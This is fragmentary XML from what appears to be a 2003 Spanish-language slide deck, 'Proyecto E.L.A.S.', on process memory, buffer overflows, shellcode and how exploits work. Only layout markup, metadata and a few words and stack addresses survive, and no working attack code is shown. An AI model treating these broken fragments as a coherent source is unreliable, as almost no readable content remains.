                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="HG Mincho Light J"/>
              </a:rPr>
              <a:t>printf("%d\n",x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13720" y="4786200"/>
            <a:ext cx="1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84880" y="914400"/>
            <a:ext cx="2544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ila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–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function(a,b,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96120" y="515772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95400" y="483228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34640" y="1371600"/>
            <a:ext cx="36972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34280" y="4829040"/>
            <a:ext cx="3956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81320" y="4857840"/>
            <a:ext cx="12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bffff9d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81320" y="1371600"/>
            <a:ext cx="12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HG Mincho Light J"/>
              </a:rPr>
              <a:t>0xbffff9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19600" y="6605640"/>
            <a:ext cx="19386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02440" y="6477120"/>
            <a:ext cx="6836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4 by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28880" y="60800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28880" y="5759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30320" y="54705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45040" y="497520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45040" y="150984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1295280"/>
            <a:ext cx="1905120" cy="508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1998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23036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2608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69040" y="2165400"/>
            <a:ext cx="69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913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32180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3522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38680" y="3827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38680" y="41324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437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69040" y="3065400"/>
            <a:ext cx="69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uffer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38680" y="47847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508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53942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56991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6004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2600" y="34894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2600" y="383868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02600" y="41432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2600" y="444816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1676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65240" y="1355760"/>
            <a:ext cx="31500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38880" y="14479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F070-C4FE-46FB-9301-B0C99AEA1AD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rganizacion de Procesos en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bordamiento de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Shell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ncionamiento de los Explo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3240-B029-4F2A-8F91-1E837538866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0T13:33:37Z</dcterms:created>
  <dc:creator>Emilio Mira Alfaro</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>santi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-07-31T15:22:01Z</dcterms:modified>
  <cp:revision>100</cp:revision>
  <dc:subject/>
  <dc:title>Proyecto E.L.A.S.</dc:title>
</cp:coreProperties>
</file>